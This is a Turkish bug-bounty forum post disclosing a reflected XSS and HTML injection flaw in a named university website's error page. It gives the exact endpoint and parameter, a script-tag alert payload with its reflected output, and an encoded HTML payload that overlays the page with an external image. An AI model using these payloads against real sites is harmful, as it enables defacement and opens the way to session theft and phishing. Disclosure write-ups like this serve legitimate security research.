- Katılım
- 2 Ocak 2026
- Mesajlar
- 55
- Tepkime puanı
- 185
- Puan
- 33
Merhaba Bughanê Üyeleri!
Bugün Gelişim Üniversitesi web sitesinde (gelisim.edu.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS ve HTML Injectıon zafiyetini detaylı teknik analiz ile paylaşıyorum.
Payload, HTML context içerisinde doğrudan işlendiği için yeni bir <script> etiketi enjekte edilmesine olanak tanımakta ve JavaScript kodunun çalıştırılmasına neden olmaktadır.
HTML INJECTION


Bugün Gelişim Üniversitesi web sitesinde (gelisim.edu.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS ve HTML Injectıon zafiyetini detaylı teknik analiz ile paylaşıyorum.
ZAFİYET DETAYLARI
- Hedef: https://gelisim.edu.tr
- Parametre: errorMessage
- Endpoint: /Error/NotFound/?errorMessage=
- Tip: Reflected Cross-Site Scripting (XSS)
- PAYLOAD:<IMG"""><SCRIPT>alert("ATAKAN")</SCRIPT>
- Etki: Session Hijacking / Keylogger / Phishing / Account Takeover
Çalışma Mantığı:
Kullanıcıdan alınan errorMessage parametresi, hata sayfası içerisinde herhangi bir filtreleme veya encode işlemi uygulanmadan doğrudan HTML içerisine yansıtılmaktadır.
JavaScript:
<p class="err-msg-err">
Message : Sayfa bulunamadı. Page Not Found.<br />
Url : https://gelisim.edu.tr/Error/NotFound/?errorMessage=<IMG"""><SCRIPT>alert("ATAKAN")</SCRIPT>
</p>
HTML INJECTION
HTML:
%22%3E%3Cstyle%3Ehtml,body%7Bmargin:0!important;padding:0!important;width:100%25!important;height:100%25!important;overflow:hidden!important;background:black!important;%7D*%7Bmargin:0!important;padding:0!important;%7D%3C/style%3E%3Cdiv%20style=%22position:fixed;top:0;left:50%25;transform:translateX(-50%25);width:100vw;height:100vh;z-index:999999;%22%3E%3Cimg%20src=%22https://i.hizliresim.com/4h9z6k0.png%22%20style=%22position:absolute;top:0;left:0;width:100vw;height:100vh;object-fit:cover;%22%3E%3C/div%3E%3C

